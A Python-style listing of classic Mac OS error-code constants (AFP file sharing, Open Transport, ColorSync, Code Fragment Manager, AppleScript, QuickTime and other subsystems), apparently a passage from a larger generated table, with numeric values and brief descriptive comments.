qtsUnsupportedDataTypeErr = -5403 #qtsUnsupportedDataTypeErr
qtsBadDataErr = -5402 #something is wrong with the data
qtsBadStateErr = -5401 #qtsBadStateErr
qtsBadSelectorErr = -5400 #qtsBadSelectorErr
errIAEndOfTextRun = -5388 #errIAEndOfTextRun
errIATextExtractionErr = -5387 #errIATextExtractionErr
errIAInvalidDocument = -5386 #errIAInvalidDocument
errIACanceled = -5385 #errIACanceled
errIABufferTooSmall = -5384 #errIABufferTooSmall
errIANoMoreItems = -5383 #errIANoMoreItems
errIAParamErr = -5382 #errIAParamErr
errIAAllocationErr = -5381 #errIAAllocationErr
errIAUnknownErr = -5380 #errIAUnknownErr
hrURLNotHandledErr = -5363 #hrURLNotHandledErr
hrUnableToResizeHandleErr = -5362 #hrUnableToResizeHandleErr
hrMiscellaneousExceptionErr = -5361 #hrMiscellaneousExceptionErr
hrHTMLRenderingLibNotInstalledErr = -5360 #hrHTMLRenderingLibNotInstalledErr
errCannotUndo = -5253 #errCannotUndo
errNonContiuousAttribute = -5252 #errNonContiuousAttribute
errUnknownElement = -5251 #errUnknownElement
errReadOnlyText = -5250 #errReadOnlyText
errEmptyScrap = -5249 #errEmptyScrap
errNoHiliteText = -5248 #errNoHiliteText
errOffsetNotOnElementBounday = -5247 #errOffsetNotOnElementBounday
errInvalidRange = -5246 #errInvalidRange
errIteratorReachedEnd = -5245 #errIteratorReachedEnd
errEngineNotFound = -5244 #errEngineNotFound
errAlreadyInImagingMode = -5243 #errAlreadyInImagingMode
errNotInImagingMode = -5242 #errNotInImagingMode
errMarginWilllNotFit = -5241 #errMarginWilllNotFit
errUnknownAttributeTag = -5240 #errUnknownAttributeTag
afpSameNodeErr = -5063 #An Attempt was made to connect to a file server running on the same machine
afpAlreadyMounted = -5062 #The volume is already mounted
afpCantMountMoreSrvre = -5061 #The Maximum number of server connections has been reached
afpBadDirIDType = -5060 #afpBadDirIDType
afpCallNotAllowed = -5048 #The server knows what you wanted to do, but won't let you do it just now
afpAlreadyLoggedInErr = -5047 #User has been authenticated but is already logged in from another machine (and that's not allowed on this server)
afpPwdPolicyErr = -5046 #Password does not conform to servers password policy
afpPwdNeedsChangeErr = -5045 #The password needs to be changed
afpInsideTrashErr = -5044 #The folder being shared is inside the trash folder OR the shared folder is being moved into the trash folder
afpInsideSharedErr = -5043 #The folder being shared is inside a shared folder OR the folder contains a shared folder and is being moved into a shared folder
afpPwdExpiredErr = -5042 #The password being used is too old: this requires the user to change the password before log-in can continue
afpPwdTooShortErr = -5041 #The password being set is too short: there is a minimum length that must be met or exceeded
afpPwdSameErr = -5040 #Someone tried to change their password to the same password on a mandatory password change
afpBadIDErr = -5039 #afpBadIDErr
afpSameObjectErr = -5038 #afpSameObjectErr
afpCatalogChanged = -5037 #afpCatalogChanged
afpDiffVolErr = -5036 #afpDiffVolErr
afpIDExists = -5035 #afpIDExists
afpIDNotFound = -5034 #afpIDNotFound
afpContainsSharedErr = -5033 #the folder being shared contains a shared folder
afpObjectLocked = -5032 #Object is M/R/D/W inhibited
afpVolLocked = -5031 #Volume is Read-Only
afpIconTypeError = -5030 #Icon size specified different from existing icon size
afpDirNotFound = -5029 #Unknown directory specified
afpCantRename = -5028 #AFPRename cannot rename volume
afpServerGoingDown = -5027 #Server is shutting down
afpTooManyFilesOpen = -5026 #Maximum open file count reached
afpObjectTypeErr = -5025 #File/Directory specified where Directory/File expected
afpCallNotSupported = -5024 #Unsupported AFP call was made
afpUserNotAuth = -5023 #No AFPLogin call has successfully been made for this session
afpSessClosed = -5022 #Session closed
afpRangeOverlap = -5021 #Some or all of range already locked by same user
afpRangeNotLocked = -5020 #Tried to unlock range that was not locked by user
afpParmErr = -5019 #A specified parameter was out of allowable range
afpObjectNotFound = -5018 #Specified file or directory does not exist
afpObjectExists = -5017 #Specified destination file or directory already exists
afpNoServer = -5016 #Server not responding
afpNoMoreLocks = -5015 #Maximum lock limit reached
afpMiscErr = -5014 #Unexpected error encountered during execution
afpLockErr = -5013 #Some or all of requested range is locked by another user
afpItemNotFound = -5012 #Unknown UserName/UserID or missing comment/APPL entry
afpFlatVol = -5011 #Cannot create directory on specified volume
afpFileBusy = -5010 #Cannot delete an open file
afpEofError = -5009 #Read beyond logical end-of-file
afpDiskFull = -5008 #Insufficient free space on volume for operation
afpDirNotEmpty = -5007 #Cannot delete non-empty directory
afpDenyConflict = -5006 #Specified open/deny modes conflict with current open modes
afpCantMove = -5005 #Move destination is offspring of source, or root was specified
afpBitmapErr = -5004 #Bitmap contained bits undefined for call
afpBadVersNum = -5003 #Unknown AFP protocol version number specified
afpBadUAM = -5002 #Unknown user authentication method specified
afpAuthContinue = -5001 #Further information required to complete AFPLogin call
afpAccessDenied = -5000 #Insufficient access privileges for operation
illegalScrapFlavorSizeErr = -4999 #illegalScrapFlavorSizeErr
illegalScrapFlavorTypeErr = -4998 #illegalScrapFlavorTypeErr
illegalScrapFlavorFlagsErr = -4997 #illegalScrapFlavorFlagsErr
scrapFlavorSizeMismatchErr = -4996 #scrapFlavorSizeMismatchErr
scrapFlavorFlagsMismatchErr = -4995 #scrapFlavorFlagsMismatchErr
nilScrapFlavorDataErr = -4994 #nilScrapFlavorDataErr
noScrapPromiseKeeperErr = -4993 #noScrapPromiseKeeperErr
scrapPromiseNotKeptErr = -4992 #scrapPromiseNotKeptErr
processStateIncorrectErr = -4991 #processStateIncorrectErr
badScrapRefErr = -4990 #badScrapRefErr
duplicateScrapFlavorErr = -4989 #duplicateScrapFlavorErr
internalScrapErr = -4988 #internalScrapErr
coreFoundationUnknownErr = -4960 #coreFoundationUnknownErr
badRoutingSizeErr = -4276 #badRoutingSizeErr
routingNotFoundErr = -4275 #routingNotFoundErr
duplicateRoutingErr = -4274 #duplicateRoutingErr
invalidFolderTypeErr = -4273 #invalidFolderTypeErr
noMoreFolderDescErr = -4272 #noMoreFolderDescErr
duplicateFolderDescErr = -4271 #duplicateFolderDescErr
badFolderDescErr = -4270 #badFolderDescErr
cmCantGamutCheckError = -4217 #Gamut checking not supported by this ColorWorld
cmNamedColorNotFound = -4216 #NamedColor not found
cmCantCopyModifiedV1Profile = -4215 #Illegal to copy version 1 profiles that have been modified
cmRangeOverFlow = -4214 #Color conversion warning that some output color values over/underflowed and were clipped
cmInvalidProfileComment = -4213 #Bad Profile comment during drawpicture
cmNoGDevicesError = -4212 #Begin/End Matching -- no gdevices available
cmInvalidDstMap = -4211 #Destination pix/bit map was invalid
cmInvalidSrcMap = -4210 #Source pix/bit map was invalid
cmInvalidColorSpace = -4209 #Profile colorspace does not match bitmap type
cmErrIncompatibleProfile = -4208 #Other ColorSync Errors
cmSearchError = -4207 #cmSearchError
cmInvalidSearch = -4206 #Bad Search Handle
cmInvalidProfileLocation = -4205 #Operation not supported for this profile location
cmInvalidProfile = -4204 #A Profile must contain a 'cs1 ' tag to be valid
cmFatalProfileErr = -4203 #cmFatalProfileErr
cmCantDeleteElement = -4202 #cmCantDeleteElement
cmIndexRangeErr = -4201 #Tag index out of range
kNSLInitializationFailed = -4200 #UNABLE TO INITIALIZE THE MANAGER!!!!! DO NOT CONTINUE!!!!
kNSLNotInitialized = -4199 #kNSLNotInitialized
kNSLInsufficientSysVer = -4198 #kNSLInsufficientSysVer
kNSLInsufficientOTVer = -4197 #kNSLInsufficientOTVer
kNSLNoElementsInList = -4196 #kNSLNoElementsInList
kNSLBadReferenceErr = -4195 #kNSLBadReferenceErr
kNSLBadServiceTypeErr = -4194 #kNSLBadServiceTypeErr
kNSLBadDataTypeErr = -4193 #kNSLBadDataTypeErr
kNSLBadNetConnection = -4192 #kNSLBadNetConnection
kNSLNoSupportForService = -4191 #kNSLNoSupportForService
kNSLInvalidPluginSpec = -4190 #kNSLInvalidPluginSpec
kNSLRequestBufferAlreadyInList = -4189 #kNSLRequestBufferAlreadyInList
kNSLNoContextAvailable = -4188 #(ContinueLookup function ptr invalid)
kNSLBufferTooSmallForData = -4187 #(Client buffer too small for data from plugin)
kNSLCannotContinueLookup = -4186 #(Can't continue lookup; error or bad state)
kNSLBadClientInfoPtr = -4185 #(nil ClientAsyncInfoPtr; no reference available)
kNSLNullListPtr = -4184 #(client is trying to add items to a nil list)
kNSLBadProtocolTypeErr = -4183 #(client is trying to add a null protocol type)
kNSLPluginLoadFailed = -4182 #(manager unable to load one of the plugins)
kNSLNoPluginsFound = -4181 #(manager didn't find any valid plugins to load)
kNSLSearchAlreadyInProgress = -4180 #(you can only have one ongoing search per clientRef)
kNSLNoPluginsForSearch = -4179 #(no plugins will respond to search request; bad protocol(s)?)
kNSLNullNeighborhoodPtr = -4178 #(client passed a null neighborhood ptr)
kNSLSomePluginsFailedToLoad = -4177 #(one or more plugins failed to load, but at least one did load; this error isn't fatal)
kNSLErrNullPtrError = -4176 #kNSLErrNullPtrError
kNSLNotImplementedYet = -4175 #kNSLNotImplementedYet
kNSLUILibraryNotAvailable = -4174 #The NSL UI Library needs to be in the Extensions Folder
kNSLNoCarbonLib = -4173 #kNSLNoCarbonLib
kNSLBadURLSyntax = -4172 #URL contains illegal characters
kNSLSchedulerError = -4171 #A custom thread routine encountered an error
kNSL68kContextNotSupported = -4170 #no 68k allowed
noHelpForItem = -4009 #noHelpForItem
badProfileError = -4008 #badProfileError
colorSyncNotInstalled = -4007 #colorSyncNotInstalled
pickerCantLive = -4006 #pickerCantLive
cantLoadPackage = -4005 #cantLoadPackage
cantCreatePickerWindow = -4004 #cantCreatePickerWindow
cantLoadPicker = -4003 #cantLoadPicker
pickerResourceError = -4002 #pickerResourceError
requiredFlagsDontMatch = -4001 #requiredFlagsDontMatch
firstPickerError = -4000 #firstPickerError
kOTPortLostConnection = -3285 #
kOTUserRequestedErr = -3284 #
kOTConfigurationChangedErr = -3283 #
kOTBadConfigurationErr = -3282 #
kOTPortWasEjectedErr = -3281 #
kOTPortHasDiedErr = -3280 #
kOTClientNotInittedErr = -3279 #
kENOMSGErr = -3278 #
kESRCHErr = -3277 #
kEINPROGRESSErr = -3276 #
kENODATAErr = -3275 #
kENOSTRErr = -3274 #
kECANCELErr = -3273 #
kEBADMSGErr = -3272 #
kENOSRErr = -3271 #
kETIMEErr = -3270 #
kEPROTOErr = -3269 # fill out missing codes
kEHOSTUNREACHErr = -3264 #No route to host
kEHOSTDOWNErr = -3263 #Host is down
kECONNREFUSEDErr = -3260 #Connection refused
kETIMEDOUTErr = -3259 #Connection timed out
kETOOMANYREFSErr = -3258 #Too many references: can't splice
kESHUTDOWNErr = -3257 #Can't send after socket shutdown
kENOTCONNErr = -3256 #Socket is not connected
kEISCONNErr = -3255 #Socket is already connected
kENOBUFSErr = -3254 #No buffer space available
kECONNRESETErr = -3253 #Connection reset by peer
kECONNABORTEDErr = -3252 #Software caused connection abort
kENETRESETErr = -3251 #Network dropped connection on reset
kENETUNREACHErr = -3250 #Network is unreachable
kENETDOWNErr = -3249 #Network is down
kEADDRNOTAVAILErr = -3248 #Can't assign requested address
kEADDRINUSEErr = -3247 #Address already in use
kEOPNOTSUPPErr = -3244 #Operation not supported on socket
kESOCKTNOSUPPORTErr = -3243 #Socket type not supported
kEPROTONOSUPPORTErr = -3242 #Protocol not supported
kENOPROTOOPTErr = -3241 #Protocol not available
kEPROTOTYPEErr = -3240 #Protocol wrong type for socket
kEMSGSIZEErr = -3239 #Message too long
kEDESTADDRREQErr = -3238 #Destination address required
kENOTSOCKErr = -3237 #Socket operation on non-socket
kEALREADYErr = -3236 #
kEWOULDBLOCKErr = -3234 #Call would block, so was aborted
kERANGEErr = -3233 #Message size too large for STREAM
kEPIPEErr = -3231 #Broken pipe
kENOTTYErr = -3224 #Not a character device
kEINVALErr = -3221 #Invalid argument
kENODEVErr = -3218 #No such device
kOTDuplicateFoundErr = -3216 #OT generic duplicate found error
kEBUSYErr = -3215 #Device or resource busy
kEFAULTErr = -3213 #Bad address
kEACCESErr = -3212 #Permission denied
kOTOutOfMemoryErr = -3211 #OT ran out of memory, may be a temporary
kEAGAINErr = -3210 #Try operation again later
kEBADFErr = -3208 #Bad file number
kENXIOErr = -3205 #No such device or address
kEIOErr = -3204 #I/O error
kEINTRErr = -3203 #Interrupted system service
kENORSRCErr = -3202 #No such resource
kOTNotFoundErr = -3201 #OT generic not found error
kEPERMErr = -3200 #Permission denied
kOTCanceledErr = -3180 #XTI2OSStatus(TCANCELED) The command was cancelled
kOTBadSyncErr = -3179 #XTI2OSStatus(TBADSYNC) A synchronous call at interrupt time
kOTProtocolErr = -3178 #XTI2OSStatus(TPROTO) An unspecified provider error occurred
kOTQFullErr = -3177 #XTI2OSStatus(TQFULL)
kOTResAddressErr = -3176 #XTI2OSStatus(TRESADDR)
kOTResQLenErr = -3175 #XTI2OSStatus(TRESQLEN)
kOTProviderMismatchErr = -3174 #XTI2OSStatus(TPROVMISMATCH) Tried to accept on incompatible endpoint
kOTIndOutErr = -3173 #XTI2OSStatus(TINDOUT) Accept failed because of pending listen
kOTAddressBusyErr = -3172 #XTI2OSStatus(TADDRBUSY) Address requested is already in use
kOTBadQLenErr = -3171 #XTI2OSStatus(TBADQLEN) A Bind to an in-use addr with qlen > 0
kOTBadNameErr = -3170 #XTI2OSStatus(TBADNAME) A bad endpoint name was supplied
kOTNoStructureTypeErr = -3169 #XTI2OSStatus(TNOSTRUCTYPE) Bad structure type requested for OTAlloc
kOTStateChangeErr = -3168 #XTI2OSStatus(TSTATECHNG) State is changing - try again later
kOTNotSupportedErr = -3167 #XTI2OSStatus(TNOTSUPPORT) Command is not supported
kOTNoReleaseErr = -3166 #XTI2OSStatus(TNOREL) No orderly release indication available
kOTBadFlagErr = -3165 #XTI2OSStatus(TBADFLAG) A Bad flag value was supplied
kOTNoUDErrErr = -3164 #XTI2OSStatus(TNOUDERR) No Unit Data Error indication available
kOTNoDisconnectErr = -3163 #XTI2OSStatus(TNODIS) No disconnect indication available
kOTNoDataErr = -3162 #XTI2OSStatus(TNODATA) No data available for reading
kOTFlowErr = -3161 #XTI2OSStatus(TFLOW) Provider is flow-controlled
kOTBufferOverflowErr = -3160 #XTI2OSStatus(TBUFOVFLW) Passed buffer not big enough
kOTBadDataErr = -3159 #XTI2OSStatus(TBADDATA) An illegal amount of data was specified
kOTLookErr = -3158 #XTI2OSStatus(TLOOK) An event occurred - call Look()
kOTSysErrorErr = -3157 #XTI2OSStatus(TSYSERR) A system error occurred
kOTBadSequenceErr = -3156 #XTI2OSStatus(TBADSEQ) Sequence specified does not exist
kOTOutStateErr = -3155 #XTI2OSStatus(TOUTSTATE) Call issued in wrong state
kOTNoAddressErr = -3154 #XTI2OSStatus(TNOADDR) No address was specified
kOTBadReferenceErr = -3153 #XTI2OSStatus(TBADF) Bad provider reference
kOTAccessErr = -3152 #XTI2OSStatus(TACCES) Missing access permission
kOTBadOptionErr = -3151 #XTI2OSStatus(TBADOPT) A Bad option was specified
kOTBadAddressErr = -3150 #XTI2OSStatus(TBADADDR) A Bad address was specified
sktClosedErr = -3109 #sktClosedErr
recNotFnd = -3108 #recNotFnd
atpBadRsp = -3107 #atpBadRsp
atpLenErr = -3106 #atpLenErr
readQErr = -3105 #readQErr
extractErr = -3104 #extractErr
ckSumErr = -3103 #ckSumErr
noMPPErr = -3102 #noMPPErr
buf2SmallErr = -3101 #buf2SmallErr
noPrefAppErr = -3032 #noPrefAppErr
badTranslationSpecErr = -3031 #badTranslationSpecErr
noTranslationPathErr = -3030 #noTranslationPathErr
couldNotParseSourceFileErr = -3026 #Source document does not contain source type
invalidTranslationPathErr = -3025 #Source type to destination type not a valid path
retryComponentRegistrationErr = -3005 #retryComponentRegistrationErr
unresolvedComponentDLLErr = -3004 #unresolvedComponentDLLErr
componentDontRegister = -3003 #componentDontRegister
componentNotCaptured = -3002 #componentNotCaptured
validInstancesExist = -3001 #validInstancesExist
invalidComponentID = -3000 #invalidComponentID
cfragLastErrCode = -2899 #The last value in the range of CFM errors.
cfragOutputLengthErr = -2831 #An output parameter is too small to hold the value.
cfragAbortClosureErr = -2830 #Used by notification handlers to abort a closure.
cfragClosureIDErr = -2829 #The closure ID was not valid.
cfragContainerIDErr = -2828 #The fragment container ID was not valid.
cfragNoRegistrationErr = -2827 #The registration name was not found.
cfragNotClosureErr = -2826 #The closure ID was actually a connection ID.
cfragFileSizeErr = -2825 #A file was too large to be mapped.
cfragFragmentUsageErr = -2824 #A semantic error in usage of the fragment.
cfragArchitectureErr = -2823 #A fragment has an unacceptable architecture.
cfragNoApplicationErr = -2822 #No application member found in the cfrg resource.
cfragInitFunctionErr = -2821 #A fragment's initialization routine returned an error.
cfragFragmentCorruptErr = -2820 #A fragment's container was corrupt (known format).
cfragCFMInternalErr = -2819 #An internal inconsistency has been detected.
cfragCFMStartupErr = -2818 #Internal error during CFM initialization.
cfragLibConnErr = -2817 #
cfragInitAtBootErr = -2816 #A boot library has an initialization function. (System 7 only)
cfragInitLoopErr = -2815 #Circularity in required initialization order.
cfragImportTooNewErr = -2814 #An import library was too new for a client.
cfragImportTooOldErr = -2813 #An import library was too old for a client.
cfragInitOrderErr = -2812 #
cfragNoIDsErr = -2811 #No more CFM IDs for contexts, connections, etc.
cfragNoClientMemErr = -2810 #Out of memory for fragment mapping or section instances.
cfragNoPrivateMemErr = -2809 #Out of memory for internal bookkeeping.
cfragNoPositionErr = -2808 #The registration insertion point was not found.
cfragUnresolvedErr = -2807 #A fragment had "hard" unresolved imports.
cfragFragmentFormatErr = -2806 #A fragment's container format is unknown.
cfragDupRegistrationErr = -2805 #The registration name was already in use.
cfragNoLibraryErr = -2804 #The named library was not found.
cfragNoSectionErr = -2803 #The specified section was not found.
cfragNoSymbolErr = -2802 #The specified symbol was not found.
cfragConnectionIDErr = -2801 #The connection ID was not valid.
cfragFirstErrCode = -2800 #The first value in the range of CFM errors.
errASInconsistentNames = -2780 #English errors:
errASNoResultReturned = -2763 #The range -2780 thru -2799 is reserved for dialect specific error codes. (Error codes from different dialects may overlap.)
errASParameterNotForEvent = -2762 #errASParameterNotForEvent
errASIllegalFormalParameter = -2761 #errASIllegalFormalParameter
errASTerminologyNestingTooDeep = -2760 #errASTerminologyNestingTooDeep
OSAControlFlowError = -2755 #Signaled when illegal control flow occurs in an application (no catcher for throw, non-lexical loop exit, etc.)
OSAInconsistentDeclarations = -2754 #Signaled when a variable is declared inconsistently in the same scope, such as both local and global
OSAUndefinedVariable = -2753 #Signaled when a variable is accessed that has no value
OSADuplicateHandler = -2752 #Signaled when more than one handler is defined with the same name in a scope where the language doesn't allow it
OSADuplicateProperty = -2751 #Signaled when a formal parameter, local variable, or instance variable is specified more than once.
OSADuplicateParameter = -2750 #Signaled when a formal parameter, local variable, or instance variable is specified more than once
OSATokenTooLong = -2742 #Signaled when a name or number is too long to be parsed
OSASyntaxTypeError = -2741 #Signaled when another form of syntax was expected. (e.g. "expected a <type> but found <this>")
OSASyntaxError = -2740 #Signaled when a syntax error occurs. (e.g. "Syntax error" or "<this> can't go after <that>")
errASCantCompareMoreThan32k = -2721 #Parser/Compiler errors:
errASCantConsiderAndIgnore = -2720 #errASCantConsiderAndIgnore
errOSACantCreate = -2710 #errOSACantCreate
errOSACantGetTerminology = -2709 #errOSACantGetTerminology
errOSADataBlockTooLarge = -2708 #Signaled when an intrinsic limitation is exceeded for the size of a value or data structure.
errOSAInternalTableOverflow = -2707 #Signaled when a runtime internal data structure overflows
errOSAStackOverflow = -2706 #Signaled when the runtime stack overflows
errOSACorruptTerminology = -2705 #Signaled when an application's terminology resource is not readable
errOSAAppNotHighLevelEventAware = -2704 #Signaled when an application can't respond to AppleEvents
errOSACantLaunch = -2703 #Signaled when application can't be launched or when it is remote and program linking is not enabled
errOSANumericOverflow = -2702 #Signaled when integer or real value is too large to be represented
errOSADivideByZero = -2701 #Signaled when there is an attempt to divide by zero
errOSAGeneralError = -2700 #Signaled by user scripts or applications when no actual error code is to be returned.
noIconDataAvailableErr = -2582 #The necessary icon data is not available
noSuchIconErr = -2581 #The requested icon could not be found
invalidIconRefErr = -2580 #The icon ref is not valid
nrCallNotSupported = -2557 #This call is not available or supported on this machine
nrTransactionAborted = -2556 #transaction was aborted
nrExitedIteratorScope = -2555 #outer scope of iterator was exited
nrIterationDone = -2554 #iteration operation is done
nrPropertyAlreadyExists = -2553 #property already exists
nrInvalidEntryIterationOp = -2552 #invalid entry iteration operation
nrPathBufferTooSmall = -2551 #buffer for path is too small
nrPathNotFound = -2550 #a path component lookup failed
nrResultCodeBase = -2549 #nrResultCodeBase
nrOverrunErr = -2548 #nrOverrunErr
nrNotModifiedErr = -2547 #nrNotModifiedErr
nrTypeMismatchErr = -2546 #nrTypeMismatchErr
nrPowerSwitchAbortErr = -2545 #nrPowerSwitchAbortErr
nrPowerErr = -2544 #nrPowerErr
nrDataTruncatedErr = -2543 #nrDataTruncatedErr
nrNotSlotDeviceErr = -2542 #nrNotSlotDeviceErr
nrNameErr = -2541 #nrNameErr
nrNotCreatedErr = -2540 #nrNotCreatedErr
nrNotFoundErr = -2539 #nrNotFoundErr
nrInvalidNodeErr = -2538 #nrInvalidNodeErr
nrNotEnoughMemoryErr = -2537 #nrNotEnoughMemoryErr
nrLockedErr = -2536 #nrLockedErr
mmInternalError = -2526 #mmInternalError
tsmDefaultIsNotInputMethodErr = -2524 #Current Input source is KCHR or uchr, not Input Method (GetDefaultInputMethod)
tsmNoStem = -2523 #No stem exists for the token
tsmNoMoreTokens = -2522 #No more tokens are available for the source text
tsmNoHandler = -2521 #No Callback Handler exists for callback
tsmInvalidContext = -2520 #Invalid TSMContext specified in call
tsmUnknownErr = -2519 #any other errors
tsmUnsupportedTypeErr = -2518 #unSupported interface type error
tsmScriptHasNoIMErr = -2517 #script has no input method or is using old IM
tsmInputMethodIsOldErr = -2516 #returned by GetDefaultInputMethod
tsmComponentAlreadyOpenErr = -2515 #text service already opened for the document
tsmTSNotOpenErr = -2514 #text service is not open
tsmTSHasNoMenuErr = -2513 #the text service has no menu
tsmUseInputWindowErr = -2512 #not TSM aware because we are using input window
tsmDocumentOpenErr = -2511 #there are open documents
tsmTextServiceNotFoundErr = -2510 #no text service found
tsmCantOpenComponentErr = -2509 #can't open the component
tsmNoOpenTSErr = -2508 #no open text service
tsmDocNotActiveErr = -2507 #document is NOT active
tsmTSMDocBusyErr = -2506 #document is still active
tsmInvalidDocIDErr = -2505 #invalid TSM documentation id
tsmNeverRegisteredErr = -2504 #app never registered error (not TSM aware)
tsmAlreadyRegisteredErr = -2503 #want to register again error
tsmNotAnAppErr = -2502 #not an application error
tsmInputMethodNotFoundErr = -2501 #tsmInputMethodNotFoundErr
tsmUnsupScriptLanguageErr = -2500 #tsmUnsupScriptLanguageErr
kernelUnrecoverableErr = -2499 #kernelUnrecoverableErr
kernelReturnValueErr = -2422 #kernelReturnValueErr
kernelAlreadyFreeErr = -2421 #kernelAlreadyFreeErr
kernelIDErr = -2419 #kernelIDErr
kernelExceptionErr = -2418 #kernelExceptionErr
kernelTerminatedErr = -2417 #kernelTerminatedErr
kernelInUseErr = -2416 #kernelInUseErr
kernelTimeoutErr = -2415 #kernelTimeoutErr
kernelAsyncReceiveLimitErr = -2414 #kernelAsyncReceiveLimitErr
kernelAsyncSendLimitErr = -2413 #kernelAsyncSendLimitErr
kernelAttributeErr = -2412 #kernelAttributeErr
kernelExecutionLevelErr = -2411 #kernelExecutionLevelErr
kernelDeletePermissionErr = -2410 #kernelDeletePermissionErr
kernelExecutePermissionErr = -2409 #kernelExecutePermissionErr
kernelReadPermissionErr = -2408 #kernelReadPermissionErr
kernelWritePermissionErr = -2407 #kernelWritePermissionErr
kernelObjectExistsErr = -2406 #kernelObjectExistsErr
kernelUnsupportedErr = -2405 #kernelUnsupportedErr
kernelPrivilegeErr = -2404 #kernelPrivilegeErr
kernelOptionsErr = -2403 #kernelOptionsErr
kernelCanceledErr = -2402 #kernelCanceledErr
kernelIncompleteErr = -2401 #kernelIncompleteErr
badCallOrderErr = -2209 #Usually due to a status call being called prior to being setup first
noDMAErr = -2208 #Can't do DMA digitizing (i.e. can't go to requested dest)
badDepthErr = -2207 #Can't digitize into this depth
notExactSizeErr = -2206 #Can't do exact size requested
noMoreKeyColorsErr = -2205 #all key indexes in use
notExactMatrixErr = -2204 #warning of bad matrix, digitizer did its best
matrixErr = -2203 #bad matrix, digitizer did nothing
qtParamErr = -2202 #bad input parameter (out of range, etc)
digiUnimpErr = -2201 #feature unimplemented
qtXMLApplicationErr = -2159 #qtXMLApplicationErr
qtXMLParseErr = -2158 #qtXMLParseErr
qtActionNotHandledErr = -2157 #qtActionNotHandledErr
notEnoughDataErr = -2149 #notEnoughDataErr
urlDataHFTPURLErr = -2148 #urlDataHFTPURLErr
urlDataHFTPServerDisconnectedErr = -2147 #urlDataHFTPServerDisconnectedErr
urlDataHFTPNoPasswordErr = -2146 #urlDataHFTPNoPasswordErr
urlDataHFTPNeedPasswordErr = -2145 #urlDataHFTPNeedPasswordErr
urlDataHFTPBadNameListErr = -2144 #urlDataHFTPBadNameListErr
urlDataHFTPNoNetDriverErr = -2143 #urlDataHFTPNoNetDriverErr
urlDataHFTPFilenameErr = -2142 #urlDataHFTPFilenameErr
urlDataHFTPPermissionsErr = -2141 #urlDataHFTPPermissionsErr
urlDataHFTPQuotaErr = -2140 #urlDataHFTPQuotaErr
urlDataHFTPNoDirectoryErr = -2139 #urlDataHFTPNoDirectoryErr
urlDataHFTPDataConnectionErr = -2138 #urlDataHFTPDataConnectionErr
urlDataHFTPServerErr = -2137 #urlDataHFTPServerErr
urlDataHFTPBadPasswordErr = -2136 #urlDataHFTPBadPasswordErr
urlDataHFTPBadUserErr = -2135 #urlDataHFTPBadUserErr
urlDataHFTPShutdownErr = -2134 #urlDataHFTPShutdownErr
urlDataHFTPProtocolErr = -2133 #urlDataHFTPProtocolErr
urlDataHHTTPRedirectErr = -2132 #urlDataHHTTPRedirectErr
urlDataHHTTPURLErr = -2131 #urlDataHHTTPURLErr
urlDataHHTTPNoNetDriverErr = -2130 #urlDataHHTTPNoNetDriverErr
urlDataHHTTPProtocolErr = -2129 #urlDataHHTTPProtocolErr
qtNetworkAlreadyAllocatedErr = -2127 #qtNetworkAlreadyAllocatedErr
notAllowedToSaveMovieErr = -2126 #notAllowedToSaveMovieErr
fileOffsetTooBigErr = -2125 #fileOffsetTooBigErr
ASDEntryNotFoundErr = -2124 #ASDEntryNotFoundErr
ASDBadForkErr = -2123 #ASDBadForkErr
ASDBadHeaderErr = -2122 #ASDBadHeaderErr
AAPNotFoundErr = -2121 #AAPNotFoundErr
AAPNotCreatedErr = -2120 #AAPNotCreatedErr
qfcbNotCreatedErr = -2119 #qfcbNotCreatedErr
qfcbNotFoundErr = -2118 #qfcbNotFoundErr
wackBadMetaDataErr = -2117 #wackBadMetaDataErr
wackForkNotFoundErr = -2116 #wackForkNotFoundErr
wackBadFileErr = -2115 #wackBadFileErr
unknownFormatErr = -2114 #unknownFormatErr
pathNotVerifiedErr = -2113 #pathNotVerifiedErr
noPathMappingErr = -2112 #noPathMappingErr
emptyPathErr = -2111 #emptyPathErr
pathTooLongErr = -2110 #pathTooLongErr
cannotBeLeafAtomErr = -2109 #cannotBeLeafAtomErr
invalidAtomTypeErr = -2108 #invalidAtomTypeErr
invalidAtomContainerErr = -2107 #invalidAtomContainerErr
invalidAtomErr = -2106 #invalidAtomErr
duplicateAtomTypeAndIDErr = -2105 #duplicateAtomTypeAndIDErr
atomIndexInvalidErr = -2104 #atomIndexInvalidErr
atomsNotOfSameTypeErr = -2103 #atomsNotOfSameTypeErr
notLeafAtomErr = -2102 #notLeafAtomErr
cannotFindAtomErr = -2101 #cannotFindAtomErr
unsupportedProcessorErr = -2097 #unsupportedProcessorErr
unsupportedOSErr = -2096 #unsupportedOSErr
qtmlUninitialized = -2095 #qtmlUninitialized
qtmlDllEntryNotFoundErr = -2094 #Windows specific errors (when qtml is loading)
qtmlDllLoadErr = -2093 #Windows specific errors (when qtml is loading)
componentDllEntryNotFoundErr = -2092 #Windows specific errors (when component is loading)
componentDllLoadErr = -2091 #Windows specific errors (when component is loading)
videoOutputInUseErr = -2090 #videoOutputInUseErr
noExportProcAvailableErr = -2089 #noExportProcAvailableErr
tuneParseOSErr = -2087 #tuneParseOSErr
tunePlayerFullOSErr = -2086 #tunePlayerFullOSErr
noteChannelNotAllocatedOSErr = -2085 #noteChannelNotAllocatedOSErr
illegalNoteChannelOSErr = -2084 #illegalNoteChannelOSErr
synthesizerOSErr = -2083 #synthesizerOSErr
synthesizerNotRespondingOSErr = -2082 #synthesizerNotRespondingOSErr
midiManagerAbsentOSErr = -2081 #midiManagerAbsentOSErr
illegalControllerOSErr = -2080 #illegalControllerOSErr
illegalInstrumentOSErr = -2079 #illegalInstrumentOSErr
illegalKnobValueOSErr = -2078 #illegalKnobValueOSErr
illegalKnobOSErr = -2077 #illegalKnobOSErr
illegalChannelOSErr = -2076 #illegalChannelOSErr
illegalPartOSErr = -2075 #illegalPartOSErr
illegalVoiceAllocationOSErr = -2074 #illegalVoiceAllocationOSErr
cantReceiveFromSynthesizerOSErr = -2073 #cantReceiveFromSynthesizerOSErr
cantSendToSynthesizerOSErr = -2072 #cantSendToSynthesizerOSErr
notImplementedMusicOSErr = -2071 #notImplementedMusicOSErr
internalComponentErr = -2070 #internalComponentErr
invalidSpriteIDErr = -2069 #invalidSpriteIDErr
invalidImageIndexErr = -2068 #invalidImageIndexErr
invalidSpriteIndexErr = -2067 #invalidSpriteIndexErr
gWorldsNotSameDepthAndSizeErr = -2066 #gWorldsNotSameDepthAndSizeErr
invalidSpritePropertyErr = -2065 #invalidSpritePropertyErr
invalidSpriteWorldPropertyErr = -2064 #invalidSpriteWorldPropertyErr
missingRequiredParameterErr = -2063 #missingRequiredParameterErr
